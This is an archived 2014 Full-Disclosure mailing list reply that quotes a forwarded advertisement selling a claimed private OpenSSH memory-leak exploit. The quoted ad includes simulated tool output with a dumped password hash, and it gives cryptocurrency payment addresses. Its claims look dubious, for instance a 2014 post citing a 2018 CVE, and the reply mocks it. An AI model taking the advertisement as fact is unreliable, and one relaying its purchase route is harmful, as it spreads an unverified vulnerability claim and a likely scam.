lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Wed, 7 May 2014 02:12:33 +0300
From: Julius Kivimäki <julius.kivimaki@...il.com>
To: debug@...soft.ltd.uk
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] OpenSSH Vulnerabilities

PAM, how does it work?


2014-05-07 1:08 GMT+03:00 <devel@...soft.ltd.uk>:

>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> http://pastebin.com/raw.?i=gjkivAf3
>
>
> - -- CUT --
> #exploit #openssh
>                 ░░░░░░                            ▓▓▓▓▓▓
>             ░░░░░░░░░░░                          ▓▓▓▓▓▓▓▓▓▓▓
>           ░░░░░░░░░░░░░                          ▓▓▓▓▓▓▓▓▓▓▓▓▓
>        ░░░░░░░░░░░░░░░░░                        ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
>      ░░░░░░░░░░░░░░░░░░░                        ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
>    ░░░░░░░░░░░░░░░░░░░░░░                      ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
>  ░░░░░░░░░░░░░░░░░░░░░░░░░                    ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
> ░░░░░░░░░░░░░░░░░░░░░░░░░█                    ▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
> ░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░  ▓▓▓▓▓▓▓▓▓▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
>   ░░░░░░░░░░░░░░░░░░░░█████░░░░░░░░  ▓▓▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
>    ░░░░░░░░░░░░░░░░░▓▓▓█████░░░░░░    ▓▓▓▓▓▓▒▒▒▒▒░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
>      ░░░░░░░░░░░░█▓▓▓▓████░░░░░░░      ▓▓▓▓▓▓▓▒▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓
>       ░░░░░░░░░▓▓▓▓▓▓▓▓▓█░░░░░░          ▓▓▓▓▓▓▒░░░░░░░░▓▓▓▓▓▓▓▓▓▓
>         ░░░▓▓▓▓▓▓▓▓▓▓▓█░░░░░░              ▓▓▓▓▓▓▒░░░░░    ▓▓▓▓▓
>          ▓▓▓▓▓▓▓▓▓▓▓░░░░░░░                  ▓▓▓▓▓▓▓░░     ░░░▓
>           ▓▓▓▓▓▓▓╔════════════════════════════════════╕░░░░░▓▓
>         ░░░░░░░░░║    OpenSSH sshd - memory leak      │▓▓▓▓▓▓▓▓▓
>        ░░░░░░░░░░║              5.1-6.X               │▓▓▓▓▓▓▓▓▓▓
>       ░░░░░░░░░░░║       (priv8, still unfixed)       │▓▓▓▓▓▓▓▓▓▓▓
>       ░░░░░░░    ╙────────────────────────────────────┘    ▓▓▓▓▓▓▓
>
> u mad Heartbleed ? ...
>
> ====
> Release date: 04/30/2014
> Product: OpenSSH
> Vendor: http://www.openssh.com/
> CVE candidate number: CVE-2018-XXXX (maybe 2020+...)
> ====
>
> We found two years ago a memory disclosure vulnerability in the OpenSSH
> server
> which allows to remotely extract data from the sshd server's children
> processes
> memory zones.
>
> This vulnerability exploits a bad check on the network layer of the sshd
> server
> that we trigger to retrieve all children processes memory sections thereby
> allowing us to dump:
> - - system users hashes
> - - keys
> - - many random things ;)
>
> This exploit was tested on:
> - - SSH-2.0-OpenSSH_5.1p1 Debian-5
> - - SSH-2.0-OpenSSH_5.1p1 DragonFly-20080927
> - - SSH-2.0-OpenSSH_5.2p1 FreeBSD-20090522
> - - SSH-2.0-OpenSSH_5.5p1 Debian-6+squeeze3
> - - SSH-2.0-OpenSSH_5.8p1 Debian-7ubuntu1
> - - SSH-2.0-OpenSSH_6.1p1 Debian-4
> - - SSH-2.0-OpenSSH_6.2p2-hpn13v14 FreeBSD-openssh-portable-6.2.p2_3,1
> - - SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1
> - - SSH-2.0-OpenSSH_6.4p1 FreeBSD-openssh-portable-6.4.p1,1
> - - SSH-2.0-OpenSSH_6.5p1 CentOS RHEL
> - - SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
> - - ... many more
>
> Enough bullshit, POC TIME !
>
> =====
>
> $> ls -lh
> total 227K
> drwxr-xr-x  2 vjn  vjn  4.0K Apr 30 01:53 .
> drwxrwxrwt 32 root root 4.0K Apr 30 01:53 ..
> - -rw-r--r--  1 vjn  vjn  236K Apr 30 01:53 icanhaze.c
>
> $ sha1sum icanhaze.c
> d7faeb46f10ea6b7058a116043c1f0ce7a158c7f  icanhaze.c
>
> $> gcc icanhaze.c -O3 -lcrypto -lopenbsd-compat -lssl -lssh -lpam -o
> icanhaze
> $> ./icanhaze
> +------------------------------+
> |  OpenSSH 5.1-6.X - infoleak  |
> | don't evar fuckin release it |
> +------------------------------+
>
> Usage: ./icanhaze [OPTIONS]
>     -h, --host <host>
>         Hostname or IP
>     -p, --port <port>
>         Port number (default: 22)
>     -d, --dump <dump_file>
>         Dump output file
>     -H, --hashes <hashes_file>
>         User hashes dump file (john)
>     -v, --verbose
>         Verbose mode
>     -D, --debug
>         Debug mode
>
> Supported architectures: x86, x86_64, armv7
> Supported operating systems: Linux, *BSD
>
> $> ./icanhaze -v -h 192.168.10.5 -p 22 -d output.dump -H
> +------------------------------+
> |  OpenSSH 5.1-6.X - infoleak  |
> | don't evar fuckin release it |
> +------------------------------+
> [I] - connecting to target 192.168.10.5 on port 22
> [I] - sshd banner: SSH-2.0-OpenSSH_6.4p1 Debian-1~bpo70+1
> [I] - let magic happenz
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [W] - bad luck... retrying
> [I] - ____STAGE_1____: OK
> [I] - mode: x86_64
> [I] - pointerz fuckery
> [I] - ____STAGE_2____: OK
> [I] - fingerprinted child sectionz table
>     7f863100f000-7f8631010000
>     7f8631213000-7f8631214000
>     7f8631418000-7f8631419000
>     7f863161b000-7f863161c000
>     7f863181e000-7f863181f000
>     7f8631a22000-7f8631a23000
>     7f8631c68000-7f8631c69000
>     7f8631e6b000-7f8631e6c000
>     7f863206d000-7f863206e000
>     7f8632272000-7f8632273000
>     7f8632475000-7f8632476000
>     7f863267a000-7f863267b000
>     7f863287e000-7f863287f000
>     7f8632a80000-7f8632a81000
>     7f8632c82000-7f8632c83000
>     7f8632e84000-7f8632e85000
>     7f8633092000-7f8633093000
>     7f8633093000-7f863309f000
>     7f86332a4000-7f86332a5000
>     7f86334b0000-7f86334b1000
>     7f86336bb000-7f86336bc000
>     7f86338c3000-7f86338c4000
>     7f8633ad7000-7f8633ad8000
>     7f8633ad8000-7f8633ada000
>     7f8633cdd000-7f8633cde000
>     7f8633ee6000-7f8633ee7000
>     7f863410e000-7f863410f000
>     7f863410f000-7f8634110000
>     7f8634327000-7f8634328000
>     7f8634328000-7f863432c000
>     7f863452f000-7f8634530000
>     7f8634745000-7f8634746000
>     7f8634746000-7f8634748000
>     7f8634acc000-7f8634acd000
>     7f8634acd000-7f8634ad2000
>     7f8634cd5000-7f8634cd6000
>     7f8634fa8000-7f8634faa000
>     7f86351e7000-7f86351e9000
>     7f86353f1000-7f86353f2000
>     7f86353f2000-7f8635420000
>     7f8635636000-7f8635637000
>     7f8635839000-7f863583a000
>     7f8635a41000-7f8635a42000
>     7f8635e13000-7f8635e22000
>     7f8635e22000-7f8635e26000
>     7f8636044000-7f8636045000
>     7f8636045000-7f8636046000
>     7f8636253000-7f8636254000
>     7f863645d000-7f863645e000
>     7f863645e000-7f863645f000
>     7f863665c000-7f8636666000
>     7f863667c000-7f863667e000
>     7f863667f000-7f8636680000
>     7f8636680000-7f8636681000
>     7f863690b000-7f863690c000
>     7f863690c000-7f8636915000
>     7f86383de000-7f8638441000
>     7fff42400000-7fff42421000
> [I] - dumping (may take some time)
>     ................................/
>     ................................/
>     ................................/
>     ................................/
>     ................................/
>     ................................/
>     ................................/
>     ................................/
>     ................................/
>     ................................-
> [I] - dump succeeded
> [I] - raw result hexdump:
> // cut
> 000ae5f0  00 00 00 00 00 00 00 00  11 10 00 00 00 00 00 00
> |................|
> 000ae600  4c 69 6e 75 78 20 64 65  62 69 61 6e 2d 6d 61 73  |Linux
> debian-mas|
> 000ae610  74 65 72 20 33 2e 31 31  2d 30 2e 62 70 6f 2e 32  |ter
> 3.11-0.bpo.2|
> 000ae620  2d 61 6d 64 36 34 20 23  31 20 53 4d 50 20 44 65  |-amd64 #1
> SMP De|
> 000ae630  62 69 61 6e 20 33 2e 31  31 2e 31 30 2d 31 7e 62  |bian
> 3.11.10-1~b|
> 000ae640  70 6f 37 30 2b 31 20 28  32 30 31 33 2d 31 32 2d  |po70+1
> (2013-12-|
> 000ae650  31 37 29 20 78 38 36 5f  36 34 0a 0a 54 68 65 20  |17)
> x86_64..The |
> 000ae660  70 72 6f 67 72 61 6d 73  20 69 6e 63 6c 75 64 65  |programs
> include|
> 000ae670  64 20 77 69 74 68 20 74  68 65 20 44 65 62 69 61  |d with the
> Debia|
> 000ae680  6e 20 47 4e 55 2f 4c 69  6e 75 78 20 73 79 73 74  |n GNU/Linux
> syst|
> 000ae690  65 6d 20 61 72 65 20 66  72 65 65 20 73 6f 66 74  |em are free
> soft|
> 000ae6a0  77 61 72 65 3b 0a 74 68  65 20 65 78 61 63 74 20  |ware;.the
> exact |
> 000ae6b0  64 69 73 74 72 69 62 75  74 69 6f 6e 20 74 65 72
> |distribution ter|
> // cut
> 000bcf10  63 68 61 72 6c 79 00 78  00 31 30 30 30 3a 31 30
> |charly.x.1000:10|
> 000bcf20  30 30 3a 43 68 61 72 6c  79 20 61 64 6d 69 6e 2c  |00:Charly
> admin,|
> 000bcf30  2c 2c 00 2f 68 6f 6d 65  2f 63 68 61 72 6c 79 00
> |,,./home/charly.|
> 000bcf40  2f 62 69 6e 2f 62 61 73  68 00 00 6f 65 00 2f 75
> |/bin/bash..oe./u|
> 000bcf50  73 72 2f 62 69 6e 2f 7a  73 68 00 00 73 65 00 00
> |sr/bin/zsh..se..|
> 000bcf60  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
> |................|
> // cut
> 000be690  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff
> |................|
> 000be6a0  ff ff ff ff ff ff ff ff  63 68 61 72 6c 79 00 24
> |........charly.$|
> 000be6b0  36 24 6f 62 6f 67 44 58  78 79 24 73 34 4d 6b 55
> |6$obogDXxy$s4MkU|
> 000be6c0  4c 43 6b 4c 58 2e 66 55  41 35 76 63 70 53 2f 67
> |LCkLX.fUA5vcpS/g|
> 000be6d0  66 4f 30 65 6f 33 2e 42  47 45 48 56 43 4d 74 33
> |fO0eo3.BGEHVCMt3|
> 000be6e0  55 55 57 77 52 46 69 47  6b 7a 4d 52 48 78 53 64
> |UUWwRFiGkzMRHxSd|
> 000be6f0  53 47 45 4f 37 57 31 6a  34 69 64 55 2e 5a 55 55
> |SGEO7W1j4idU.ZUU|
> 000be700  77 62 30 6e 43 6a 44 63  46 64 77 36 32 6f 6c 59
> |wb0nCjDcFdw62olY|
> 000be710  2e 00 31 36 31 39 30 3a  30 3a 39 39 39 39 39 3a
> |..16190:0:99999:|
> 000be720  37 3a 3a 3a 00 00 00 00  00 00 00 00 00 00 00 00
> |7:::............|
> 000bf0c0  61 31 2d 39 36 2d 65 74  6d 40 6f 70 65 6e 73 73
> |a1-96-etm@...nss|
> 000bf0d0  68 2e 63 6f 6d 2c 68 6d  61 63 2d 6d 64 35 2d 39
> |h.com,hmac-md5-9|
> 000bf0e0  36 2d 65 74 6d 40 6f 70  65 6e 73 73 68 2e 63 6f
> |6-etm@...nssh.co|
> 000bf0f0  6d 2c 68 6d 61 63 2d 6d  64 35 2c 68 6d 61 63 2d
> |m,hmac-md5,hmac-|
> 000bf100  73 68 61 31 2c 75 6d 61  63 2d 36 34 40 6f 70 65
> |sha1,umac-64@...|
> 000bf110  6e 73 73 68 2e 63 6f 6d  2c 75 6d 61 63 2d 31 32
> |nssh.com,umac-12|
> 000bf120  38 40 6f 70 65 6e 73 73  68 2e 63 6f 6d 2c 68 6d
> |8@...nssh.com,hm|
> 000bf130  61 63 2d 73 68 61 32 2d  32 35 36 2c 68 6d 61 63
> |ac-sha2-256,hmac|
> // cut
> 0024db80  35 33 20 33 61 20 36 35  20 20 7c 4c 41 4e 47 55  |53 3a 65
> |LANGU|
> 0024db90  41 47 45 3d 65 6e 5f 55  53 3a 65 7c 0a 30 30 30
> |AGE=en_US:e|.000|
> // cut
> 002516d0  36 39 20 36 66 20 36 65  20 20 7c 65 73 73 69 6f  |69 6f 6e
> |essio|
> 002516e0  6e 29 3a 20 73 65 73 73  69 6f 6e 7c 0a 30 30 30  |n):
> session|.000|
> 002516f0  63 32 61 33 30 20 20 32  30 20 36 66 20 37 30 20  |c2a30  20
> 6f 70 |
> 00251700  36 35 20 36 65 20 36 35  20 36 34 20 32 30 20 20  |65 6e 65 64
> 20  |
> 00251710  36 36 20 36 66 20 37 32  20 32 30 20 37 35 20 37  |66 6f 72 20
> 75 7|
> 00251720  33 20 36 35 20 37 32 20  20 7c 20 6f 70 65 6e 65  |3 65 72  |
> opene|
> 00251730  64 20 66 6f 72 20 75 73  65 72 7c 0a 30 30 30 63  |d for
> user|.000c|
> // cut
> 00251770  20 36 34 20 33 64 20 20  7c 20 63 68 61 72 6c 79  | 64 3d  |
> charly|
> 00251780  20 62 79 20 28 75 69 64  3d 7c 0a 30 30 30 63 32  | by
> (uid=|.000c2|
> 00251790  61 35 30 20 20 33 30 20  32 39 20 30 30 20 30 30  |a50  30 29
> 00 00|
> [I] - System users hashes (1):
>
> charly:$6$obogDXxy$s4MkULCkLX.fUA5vcpS/gfO0eo3.BGEHVCMt3UUWwRFiGkzMRHxSdSGEO7W1j4idU.ZUUwb0nCjDcFdw62olY.:16190:0:99999:7:::
> [I] - Done, exiting...
>
> $>
>
> =====
> Since we detected few exploitations tentatives of this vulnerability
> through
> our honeypots network, we concluded that an other team / organization
> discovered it and decided to sell it.
> (Yes, we build honeypots rules for our exploits)
>
> We don't have access to exploit black markets and we are now happy to
> offering
> it for sale to you both black and white hats.
>
> == How to buy ==
> Send 66666.6 BC (Blackcoin) to BLkrmaoY7XQfUUCSCJfHGq8tTig5qJmZXT
> or
> 2000000 WC (Whitecoin) to Wbi8SqBjymeedtNwM9zhaSm3bMnZvgifR2
> or
> 20 BTC (Bitcoin) to 14PEL35LQf81oCvSPurhoyTSvosvtQT7u3
>
> then send your transaction ID by mail to olckrrii3@...nmailbox.org and
> we will
> send you the download link and password. (PGP recommended)
>
> icanhaze.c sha1:d7faeb46f10ea6b7058a116043c1f0ce7a158c7f
>
> Please note that we are busy and we will NOT answer to questions, social
> engineering tentatives or dumb comments. Price is non-negotiable.
> ==
>
> Some teraoctets of custom pintools and ASAN traces give us many other
> vulnerabities to dig and work to do, see you soon for some news about :
> - - BIND
> - - Nginx
> - - Apache HTTPd
>
> . 1\-5\61\-J\48/a \~£\3|2\D6\ %%!%}).
> R.
>
> - -- CUT --
>
> Can anyone verify this?
>
> - --
> ==
>
> Don Alexander
>
> It's a tough job, but some mug has to do it...
>
> RooSoft Ltd
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.15 (GNU/Linux)
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iEYEARECAAYFAlNpXWgACgkQuipFNInZ6evZZACghN8Fd6ZIXaDtgnmxvcxpd+MG
> DpEAn3iM0XdhZIe4U2cMYI6XrniZ7iBH
> =ZxbR
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ